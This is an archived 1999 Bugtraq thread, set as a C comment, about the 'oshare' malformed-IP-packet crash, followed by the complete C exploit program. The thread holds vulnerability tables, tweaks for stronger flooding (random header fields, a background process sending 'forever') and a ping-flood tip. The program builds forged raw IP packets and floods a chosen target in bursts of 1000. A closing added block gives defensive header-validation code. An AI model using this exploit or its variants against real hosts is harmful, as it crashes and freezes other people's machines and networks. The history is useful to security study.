/* Date: Thu, 28 Jan 1999 09:41:24 -0800
From: Aleph One
To: BUGTRAQ@netspace.org
Subject: Re: oshare testing

A summary of the replies from people testing the oshare program against
different versions of Windows:

Reported Vulnerable (Crash):

  Windows 95                                        Nicu Pavel
  Windows 95                                        "C.J. Oster"
  Windows 95 + USB                                  kpavlov@srgtampa.com
  Windows 95 OSR2                                   Nicu Pavel
  Windows 95 Japanese                               sen_ml@eccosys.com
  Windows 95 DK, attack from Linux 2.2.0, 2.0.36 and SunOS 4.1.4  nino@inform.dk
  Windows 95 UK, attack from Linux 2.2.0, 2.0.36 and SunOS 4.1.4  nino@inform.dk
  Windows 98                                        Nicu Pavel
  Windows 98                                        maniac@JADIERKO.LOCALHOST.SK
  Windows 98 Japanese                               sen_ml@eccosys.com
  Windows 98 UK, attack from Linux 2.2.0, 2.0.36 and SunOS 4.1.4  nino@inform.dk

Reported Vulnerable (Frozen, no BSOD):

  Windows 98 4.10.1998, all windowsupdate patches. Launched attack from Linux.  "Keith Warno"

Reported Vulnerable (Frozen until packets stop):

  Windows 98                                        "C.J. Oster"
  Windows 98                                        Vanja Hrustic

Reported Not Vulnerable:

  Windows 98 English                                sen_ml@eccosys.com
  Windows 98, tested from Linux                     tsd@Cal001307.student.utwente.nl
  Windows NT 4.0 SP3                                maniac@JADIERKO.LOCALHOST.SK
  Windows NT 4.0 SP4 Japanese                       sen_ml@eccosys.com
  Linux 2.0.36                                      maniac@JADIERKO.LOCALHOST.SK

Someone also mentioned that Linux (2.0.36) replaces the ip total length
field with 40, the actual ip-packet length (as seen by pcap).

--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

--------------------------------------------------------------------------
Date: Mon, 25 Jan 1999 15:38:43 +0900
From: DEF CON ZERO WINDOW
To: BUGTRAQ@netspace.org
Subject: Win98 crash?

Hi,

Windows98 crashed by the packet which added a hand to the value of the IP
header of the packet a little. (From now, the packet of this structure is
called with "oshare packet".) Because it isn't familiar, I don't know what
kind of error happens concretely inside OS to the inside of Windows. But,
ihl and tot_len.
Then, it guesses that crash will happen by the value of frag_bit&frag_off.
But, because value is wrong, this "oshare packet" can't be transmitted to
the outside of the network. This is here well, and it is here badly, too.
But, even whose machine will be able to be killed in the same segment.
Before someone improves this program, MicroSoft should take a countermeasure
immediately.

A Macintosh crashed by the "oshare packet" in the same way, too. But, it
isn't realized by this program. It will be released soon.

Reboot hangs freely if it becomes blue screen when Windows98 receives an
"oshare packet". When blue screen comes out, the function of the network
can't be used any more after it. The error of TCP/IP is started in the case
of the Macintosh, and the function of the network can't be used any more.

Is this phenomenon a bug?

--------------------------------------------------------------------------
From: dorqus maximus
To: BUGTRAQ@netspace.org
Subject: Re: Win98 Crash?

DEF CON ZERO WINDOW wrote...

> But, because value is wrong, this "oshare packet" can't be transmitted
> to the outside of the network. This is here well, and it is here badly,
> too. But, even whose machine will be able to be killed in the same
> segment.

This oshare.c code may have crashed our Checkpoint Firewall-1, version 3.0b,
Build Number: 3083.
(Sun Sparc, Solaris 2.5.1)

After running it I lost internet connectivity and saw the following on the
console of our firewall server:

FW-1: packet size too big (131060) from 0x01010101, ip_p=17
FW-1: packet size too big (131060) from 0x01010101, ip_p=17
FW-1: packet size too big (131060) from 0x01010101, ip_p=17
FW-1: packet size too big (131060) from 0x01010101, ip_p=17
FW-1: packet size too big (131060) from 0x01010101, ip_p=17
FW-1: packet size too big (131060) from 0x01010101, ip_p=17
FW-1: packet size too big (131060) from 0x01010101, ip_p=17
FW-1: packet size too big (131060) from 0x01010101, ip_p=17
FW-1: packet size too big (131060) from 0x01010101, ip_p=17
FW-1: packet size too big (131060) from 0x01010101, ip_p=17
FW-1: packet size too big (131060) from 0x01010101, ip_p=17

The machine could not be soft booted and needed to be hard booted (power
cycled). I will not (or cannot) try and duplicate this, since I can't afford
to crash our firewall again :)

To give a brief network sketch:

Linux Box (running oshare) -> Router -- Frame Relay -> Router -> Firewall-1 machine -> Dest Win98 box

I cannot confirm that this program crashed our firewall, but I would say
it's a safe bet. I'm no C programmer, but I think this part here is the
guilty part: (Line 65 or so)

  ip->frag_off = htons( 16383 );
  ip->ttl = 0xff;
  ip->protocol = IPPROTO_UDP;
  ip->saddr = htonl( inet_addr( "1.1.1.1" ) );
  ip->daddr = dst_addr;
  ip->check = in_cksum( ( u_short *)ip, 44 );

YMMV, of course.

Dorqus

-----------------------------------------------------------------------------
Date: Wed, 27 Jan 1999 04:08:22 +0700
From: Vanja Hrustic
To: BUGTRAQ@netspace.org
Subject: Re: Win98 Crash?

At 14:31 25/01/99 -0500, dorqus maximus wrote:
>This oshare.c code may have crashed our Checkpoint Firewall-1, version 3.0b,
>Build Number: 3083. (Sun Sparc, Solaris 2.5.1)

[snip]

Little modification in the source. For example...
----------------------------------------------
  ip->ihl = 22;
  ip->frag_off = htons( -16383 );
----------------------------------------------

Compile, and send heaps of packets ('./oshare x.x.x.x 300' for example) to
local Windows 98/NT box. It should freeze (literally) while packets are
travelling. It recovers after the 'attack' is finished (shouldn't be a big
problem to leave a process in the background that will send packets forever).

This was tested against Windows 98 and Windows NT 4.0 (2 Workstations and
1 Server - all with SP4 applied, no post SP4 hotfixes).

*Please*, don't mail me with "It didn't work for me!" - that's why I post
it here, so people can test & make summaries.

Play around with source, you can get interesting effects (and responses
from router :). Don't try to flood NT boxes outside internal network -
packets won't get out (they didn't for me - others could have different
results).

It will also affect HP-UX (tested against 10.20), but I didn't get more
than "jumping mouse" effect. Load is higher, but machine is functional.

Linux (2.0.36 and 2.2.0-pre4) was not affected.

(final note: program was compiled and 'initiated' on linux box w/ 2.2.0-pre4
kernel)

Regards,

Vanja Hrustic
Information Systems Manager
Siam Relay Ltd.
Phone: +662-713-5130
Fax  : +662-713-5132
http://www.siamrelay.com - Siam Relay Ltd. - Security & E-Commerce
http://safer.siamrelay.com - Security Alert For Enterprise Resources

-----------------------------------------------------------------------------
Date: Wed, 27 Jan 1999 07:49:27 +0900
From: DEF CON ZERO WINDOW
To: BUGTRAQ@netspace.org
Subject: Re: Win98 Crash? (An additional item)

Hi,

The cause that it doesn't work well is thought to be here.

1) A difference in the version of OS.
   It works with ja, and it may not work with en.

2) Modification of the code.
   When it was rewritten, my acquaintance's machine crashed a part.
   This modification makes the cause of the bug much more vague, Only, by
   100 packet.
  ip->ihl = rand() % 16;
  ip->tot_len = rand() % 0xffff;

Signed by R00t Zer0( e-mail : defcon0@ugtop.com )

-----------------------------------------------------------------------------
Date: Tue, 26 Jan 1999 13:41:36 -0800
From: route@RESENTMENT.INFONEXUS.COM
To: BUGTRAQ@netspace.org
Subject: Re: Win98 Crash?

[dorqus maximus wrote]
|
| This oshare.c code may have crashed our Checkpoint Firewall-1, version 3.0b,
| Build Number: 3083. (Sun Sparc, Solaris 2.5.1)

Sending 10,000 (not really --see below) of these `oshare` packets failed to
do anything to the following machines:

OpenBSD 2.4
FreeBSD 3.0
Solaris 2.7
Linux 2.1.124 SMP
Windows 98

A cursory glance at the code reveals two noteworthy things:

1. There is no pause during packet injection. This results in a large
   amount of dropped packets. Your results will vary, but on my 100Mb
   ethernet, I saw about a 30% - 40% packet loss.

2. The packet is built inside a 40 byte buffer, yet is assigned a size of
   44 bytes (and a header length of 44 bytes). The checksum is also computed
   across this phantom 44 byte size. When injecting into the network,
   however, only the original 40 bytes are written (anything larger, of
   course, would likely end up SIGSEGVing). The end result is a bad checksum
   on the other end.

Finally, in closing, allow me to shamelessly plug libnet. Again. Libnet,
simply put, is a C library for portable packet creation. The above
`exploit` under libnet, can be rewritten portably in minutes. Beyond that
(especially when combined with libpcap) it can be used to build powerful
network applications without worrying about low-level packet interface
nuances. Soon to be released version .10 offers numerous bug and
portability fixes, several new utility and packet building modules, as well
as additions to the FreeBSD and OpenBSD Ports collection.

http://www.infonexus.com/~daemon9/Libnet

--
I live a world of paradox...
My willingness to destroy is your chance for improvement, my hate is your
faith -- my failure is your victory, a victory that won't last.

--------------------------------------------------------------------------
Date: Tue, 2 Feb 1999 23:58:27 -0600
From: C.J. Oster
To: BUGTRAQ@netspace.org
Subject: More oshare testing.

While testing the oshare attack a little more, I have found something that
you may find interesting. Here at the university, many people are running
the same installation of windows, ie off of the same cd, same patches, etc.
The differences in behavior seem to be due to the type of network card
installed in the machine. Here is a VERY small list.

win95 is broken and bluescreens all the time.

win98 with the following network cards...

  LinkSys ISA (ne2000 chipset): Spontaneous Reboot.
  LinkSys PCI (ne2000):         Blue Screen
  3c509 (ISA):                  Blue Screen
  3c590 (PCI):                  Some Blue Screens, others Hang
  3c905 (PCI):                  Hangs until packets stop coming, then complete wakeup.

I wasn't able to test macs because we have so few here, but the two I did
test either froze completely or had no effect. Results were not consistent.

So the question now is "Is oshare a hardware driver problem and not a
winsock bug?"

-CJO-

--------------------------------------------------------------------------
Date: Fri, 5 Feb 1999 07:27:08 -0200
From: Fabio Bastiglia Oliva
To: BUGTRAQ@netspace.org
Subject: Oshare tests table

Hello,

My english is not so good! Sorry! :) But I hope that my table may help with
the oshare tests.

The table below shows the oshare tests results that I made in my network
environment. I made these tests in English and Portuguese versions of
Windows.
---
My Network environment:

Servers
  Novell Netware 4.11 IPX - TCP/IP
  Linux Slackware 3.6
  SunOS 5.6

NICs (Network Interface Card)
  Genius
  Encore
  Realtek
  3Com - 3C905b-TX

HUBs
  3Com - Super Stack II
---

-----------------------------------
Effects:
  S - Frozen until packet stop
  F - Frozen
  B - Blue Screen
  R - Reboot
-----------------------------------
AtkSrc (Attack Source):
  L - Linux
  S - SunOS
-----------------------------------
Info:
  F  - Full Install
  U1 - Up from Windows 3.xx
  U2 - Up from Windows 95 (4.00.950)
  U3 - Up from Windows 95 (4.00.1111)
  C  - Conseal PC Firewall Installed
-----------------------------------
Lang (Language):
  E - English
  P - Portuguese
-----------------------------------

Test Results:

+----------------------+------+--------+--------+----------+-----------+
| OS & Version         | Vuln | Effect | AtkSrc | Info     | Lang      |
+----------------------+------+--------+--------+----------+-----------+
|Windows 95 4.00.950   | YES  | F B    | L S    | F        | E P       |
|                      |------+--------+--------+----------+-----------+
|                      | YES  | F B    | L S    | U1       | E P       |
|                      |------+--------+--------+----------+-----------+
|                      | YES  | F B S  | L S    | U1 C     | E P       |
+----------------------+------+--------+--------+----------+-----------+
|Windows 95 4.00.1111  | YES  | F B    | L S    | F        | E P       |
| or                   |------+--------+--------+----------+-----------+
|Windows 95 950b       | YES  | F B    | L S    | U1       | E P       |
|                      |------+--------+--------+----------+-----------+
|                      | YES  | F B S  | L S    | U1 C     | E P       |
+----------------------+------+--------+--------+----------+-----------+
|Windows 98 4.10.1998  | YES  | R      | L S    | F        | E P       |
|                      |------+--------+--------+----------+-----------+
|                      | YES  | F R    | L S    | U2       | E P       |
|                      |------+--------+--------+----------+-----------+
|                      | YES  | F R    | L S    | U3       | E P       |
|                      |------+--------+--------+----------+-----------+
|                      | YES  | S      | L S    | F C      | E P       |
|                      |------+--------+--------+----------+-----------+
|                      | YES  | S      | L S    | U2 C     | E P       |
|                      |------+--------+--------+----------+-----------+
|                      | YES  | S      | L S    | U3 C     | E P       |
+----------------------+------+--------+--------+----------+-----------+
|Windows NT 4 SP4      | NO   | ---    | ---    | F        | E         |
+----------------------+------+--------+--------+----------+-----------+
|Windows 2000 Beta     | NO   | ---    | ---    | F        | E         |
+----------------------+------+--------+--------+----------+-----------+
|Linux Slackware 2.0.36| NO   | ---    | ---    | ---      | ---       |
+----------------------+------+--------+--------+----------+-----------+

Multiple acronyms means that the test results are the same or the test
generates different/multiple effects in the same system.

Best Regards

-------------------------------
Fabio Bastiglia Oliva
fboliva@safenetworks.com
Safe Networks Informatica LTDA.
http://www.safenetworks.com

--------------------------------------------------------------------------
Date: Fri, 5 Feb 1999 23:08:47 -0500
From: rewt
To: BUGTRAQ@netspace.org
Subject: Re: Oshare tests table

Try pinging the windows box with large amounts of icmp...I left 5 screened
pings, each set to 65000 size...Windows will freeze shortly after it's
loaded. You might also try to ping with -f.

--------------------------------------------------------------------------
*/

/****************************************************************************/
/* [ oshare_1_gou ver 0.1 ] -- Dressing up No.1 --                          */
/*                                                                          */
/* This program transmits the "oshare" packet which starts a machine again  */
/* or crash. But, because it can't pass through the router, it can be       */
/* carried out only in the same segment.                                    */
/* "oshare packet" is (frag 39193:-4@65528+), If ihl and tot_len are        */
/* changed, it has already tested that it becomes possible to kill Mac, too.*/
/*                 -----------------------------------------                */
/*                 Written by R00t Zer0                                     */
/*                 E-Mail  : defcon0@ugtop.com                              */
/*                 Web URL : http://www.ugtop.com/defcon0/index.htm         */
/****************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include <netdb.h>

u_short in_cksum( u_short *, int );
int send_oshare_packet( int, u_long );

/* Standard Internet checksum (RFC 1071) over len bytes at addr. */
u_short in_cksum( u_short *addr, int len )
{
    int nleft = len;
    u_short *w = addr;
    int sum = 0;
    u_short answer = 0;

    while( nleft > 1 )
    {
        sum += *w++;
        nleft -= 2;
    }

    if( nleft == 1 )
    {
        *( u_char *)( &answer ) = *( u_char *)w;
        sum += answer;
    }

    sum = ( sum >> 16 ) + ( sum & 0xffff );
    sum += ( sum >> 16 );
    answer = ~sum;
    return( answer );
}

/* Builds and sends one "oshare" packet: a bare IP header with ihl = 11
 * (a 44-byte header) and tot_len = 44, built in a 40-byte buffer. Only
 * 40 bytes go on the wire, but the checksum is taken over 44 (reading
 * past the buffer), so the header length, total length and checksum all
 * disagree with the packet actually sent. */
int send_oshare_packet( int sock_send, u_long dst_addr )
{
    char *packet;
    int send_status;
    struct iphdr *ip;
    struct sockaddr_in to;

    packet = ( char *)malloc( 40 );
    ip = ( struct iphdr *)( packet );
    memset( packet, 0, 40 );

    ip->version  = 4;
    ip->ihl      = 11;
    ip->tos      = 0x00;
    ip->tot_len  = htons( 44 );
    ip->id       = htons( 1999 );
    ip->frag_off = htons( 16383 );       /* MF set, offset 8191 * 8 = 65528 */
    ip->ttl      = 0xff;
    ip->protocol = IPPROTO_UDP;
    ip->saddr    = htonl( inet_addr( "1.1.1.1" ) );
    ip->daddr    = dst_addr;
    ip->check    = in_cksum( ( u_short *)ip, 44 );

    memset( &to, 0, sizeof( to ) );
    to.sin_family      = AF_INET;
    to.sin_port        = htons( 0x123 );
    to.sin_addr.s_addr = dst_addr;

    send_status = sendto( sock_send, packet, 40, 0,
                          ( struct sockaddr *)&to, sizeof( struct sockaddr ) );
    free( packet );
    return( send_status );
}

/* argv[1] is the target host name or address, argv[2] the number of
 * 1000-packet bursts to send. */
int main( int argc, char *argv[] )
{
    int loop, loop2;
    int sock_send;
    u_long dst_addr = 0;
    struct hostent *host;
    struct sockaddr_in addr;
    time_t t;

    if( argc != 3 )
    {
        printf( "Usage : %s \n", argv[0] );
        exit( -1 );
    }

    t = time( 0 );
    srand( ( u_int )t );

    memset( &addr, 0, sizeof( struct sockaddr_in ) );
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr( argv[1] );
    if( addr.sin_addr.s_addr == INADDR_NONE )
    {
        host = gethostbyname( argv[1] );
        if( host == NULL )
        {
            printf( "Unknown host %s.\n", argv[1] );
            exit( -1 );
        }
        addr.sin_family = host->h_addrtype;
        memcpy( ( caddr_t )&addr.sin_addr, host->h_addr, host->h_length );
    }
    memcpy( &dst_addr, ( char *)&addr.sin_addr.s_addr, 4 );

    if( ( sock_send = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) == -1 )
    {
        perror( "Getting raw send socket" );
        exit( -1 );
    }

    printf( "\n\"Oshare Packet\" sending" );
    fflush( stdout );

    for( loop = 0; loop < atoi( argv[2] ); loop++ )
    {
        for( loop2 = 0; loop2 < 1000; loop2++ )
            send_oshare_packet( sock_send, dst_addr );
        fprintf( stderr, "." );
        fflush( stdout );
    }

    printf( "\n\nDone.\n\n" );
    fflush( stdout );
    close( sock_send );
    exit( 0 );
}
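Added example, not part of the program or of any post above: the header sanity checks a receiving stack or packet filter should make before trusting ihl, tot_len or the fragment fields, run against a header built from the program's own field values (id 1999, ttl 255, UDP, source 1.1.1.1; the destination 192.168.0.2 is a placeholder). It covers route@'s point that the header claims 44 bytes while 40 go on the wire, Aleph One's note that Linux rewrites tot_len to the real 40, and both frag_off values used in the thread (16383 and -16383).

```c
#include <stdint.h>
#include <stddef.h>

enum ip_verdict { IP_OK, IP_BAD_VERSION, IP_BAD_IHL, IP_HDR_TRUNCATED, IP_BAD_TOTLEN, IP_BAD_CSUM, IP_BAD_FRAG };

/* RFC 1071 one's-complement checksum; over a valid header (checksum field included) it yields 0. */
uint16_t ip_cksum(const uint8_t *p, size_t len)
{
    uint32_t sum = 0;
    for (; len > 1; p += 2, len -= 2) sum += (uint16_t)((p[0] << 8) | p[1]);
    if (len) sum += (uint16_t)(p[0] << 8);
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Checks a receiving stack or filter must make before trusting ihl, tot_len or
 * the fragment fields; caplen is how many bytes actually arrived on the wire. */
enum ip_verdict check_ipv4(const uint8_t *b, size_t caplen)
{
    if (caplen < 20) return IP_HDR_TRUNCATED;
    if ((b[0] >> 4) != 4) return IP_BAD_VERSION;
    unsigned ihl = b[0] & 0x0f, hlen = ihl * 4;
    if (ihl < 5) return IP_BAD_IHL;              /* a header is never shorter than 20 bytes */
    if (hlen > caplen) return IP_HDR_TRUNCATED;  /* oshare: ihl=11 claims 44 bytes, only 40 were sent */
    unsigned tot_len = (b[2] << 8) | b[3];
    if (tot_len < hlen || tot_len > caplen) return IP_BAD_TOTLEN;
    if (ip_cksum(b, hlen) != 0) return IP_BAD_CSUM;
    unsigned frag = (b[6] << 8) | b[7], payload = tot_len - hlen;
    if (frag & 0x8000) return IP_BAD_FRAG;                         /* reserved bit must be zero (-16383 sets it) */
    if ((frag & 0x1fff) * 8 + payload > 65535) return IP_BAD_FRAG;  /* 16383 -> offset 65528: data would pass 64K */
    if ((frag & 0x2000) && payload % 8) return IP_BAD_FRAG;        /* non-final fragments are 8-byte multiples */
    return IP_OK;
}

/* Constructed sample built from the program's field values (ihl, tot_len, frag_off as
 * parameters), checksummed over ihl*4 bytes as the program does; daddr is a placeholder. */
enum ip_verdict verdict_for(unsigned ihl, unsigned tot_len, unsigned frag_off, size_t caplen)
{
    uint8_t h[64] = {0};                          /* room for any ihl, unlike the 40-byte malloc */
    h[0] = 0x40 | (ihl & 0x0f);
    h[2] = tot_len >> 8;  h[3] = tot_len & 0xff;
    h[4] = 1999 >> 8;     h[5] = 1999 & 0xff;     /* id */
    h[6] = frag_off >> 8; h[7] = frag_off & 0xff;
    h[8] = 0xff;          h[9] = 17;              /* ttl, IPPROTO_UDP */
    h[12] = h[13] = h[14] = h[15] = 1;            /* saddr 1.1.1.1 */
    h[16] = 192; h[17] = 168; h[18] = 0; h[19] = 2;
    uint16_t c = ip_cksum(h, (ihl & 0x0f) * 4);
    h[10] = c >> 8;       h[11] = c & 0xff;
    return check_ipv4(h, caplen);
}
```

A well-formed 20-byte header with 8 bytes of payload passes, while the oshare shape is rejected on the header-length check before the checksum is even consulted; Linux's rewritten tot_len of 40 does not rescue it, since ihl still claims 44.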